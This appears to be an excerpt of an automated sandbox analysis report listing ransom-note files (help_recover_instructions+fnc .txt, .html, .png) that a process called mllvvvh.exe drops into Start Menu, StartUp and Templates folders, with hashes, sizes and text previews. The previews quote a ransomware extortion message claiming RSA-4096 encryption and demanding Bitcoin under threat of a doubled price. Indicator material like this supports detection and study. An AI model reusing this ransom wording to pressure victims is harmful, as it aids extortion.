                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):948528
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZCh
                  MD5:C9AA9DDD1AFF5A6EA3CF776957B2986D
                  SHA1:A1C3B4885A645E1D8880ABD6ECD4AA7884F0E06C
                  SHA-256:857E1A815ACDB383FBE05B8FC4D7A24E32D78D502B1F755907A7EB642E6959B8
                  SHA-512:CC26C554FAEDA944C8BC3EB71A75D76626934B338C4C7187C6A336047159C4E07557CE48FB959886A954D445173783E0A34EABE67656B84E77A5D2674DCC06A9
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):29358
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:47DEFD617E5BA855EA5310C50841E04C
                  SHA1:0DDB4EB33A385C7C27ADCEA7F42C0AA5203D26D9
                  SHA-256:DD6FD0C93E7D155358EECDB7D866F474851E7D96F027AF4BB66541AF524746A9
                  SHA-512:E2E922947B53B32E9B7C47A11B7BE1BAA316620C21AD7DB17927F19FB3445EBA78243E4D96115BB3D12F5CCC88758B6A5E1E23F242A2DD42C000F4F1235F3E4B
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):117840
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:70F73D780A4E5A3D45E6026BB66D83E3
                  SHA1:ED41B79F22D5D319EF4A62742644920286BA4A8C
                  SHA-256:0F968FB6B42FE42816E2ECAAFF6914C65624A7D5E550E2F9518CD13C91862FBC
                  SHA-512:522D8505A2E34F0E925962A0225CD0132D6E2FE7CBE182DDEE797F2B9D3AF49AF128D6BE866B70C1548DD57CAC820E6AE4BADEF85FDE672632D2979A76E64C5A
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1016280
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZCu
                  MD5:7ACBA25A5B87828C3CDE396FF8FBB1C5
                  SHA1:81124943F3D73A96DD260ACF800641D3B5935A88
                  SHA-256:41D65253CDD27829CB391175573B6FA683E685EC0DF595CFA093706AA0A6924E
                  SHA-512:6B24D2B336B12C7855F7296A5DC36516D3E25E5DDBDEB154E761AD38528C71D39A94B36801B1B1072404A4BA4E8A30D914ECC829495ADDEB6E9A79AE3CB72BF3
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Start Menu\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31455
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6FEDBC0B5455746EC9C94454F3D43FE5
                  SHA1:56D3C2E4E25E674280ACFC29588D5A486AAEE8FD
                  SHA-256:F6E0F552BA3084A2AA7E7F786216493CFB90C81357AA2F085EC225FE6F2F21B4
                  SHA-512:A7F362AEF672F1EDFE48CC858324563D0D2110E90388F863F90586E6D7694C1DBB80D3651F5577416AAFD429C9BA4362976BBDA9F2CA9010F2D5309F139429C4
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Templates\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):117840
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:70F73D780A4E5A3D45E6026BB66D83E3
                  SHA1:ED41B79F22D5D319EF4A62742644920286BA4A8C
                  SHA-256:0F968FB6B42FE42816E2ECAAFF6914C65624A7D5E550E2F9518CD13C91862FBC
                  SHA-512:522D8505A2E34F0E925962A0225CD0132D6E2FE7CBE182DDEE797F2B9D3AF49AF128D6BE866B70C1548DD57CAC820E6AE4BADEF85FDE672632D2979A76E64C5A
                  Malicious:false
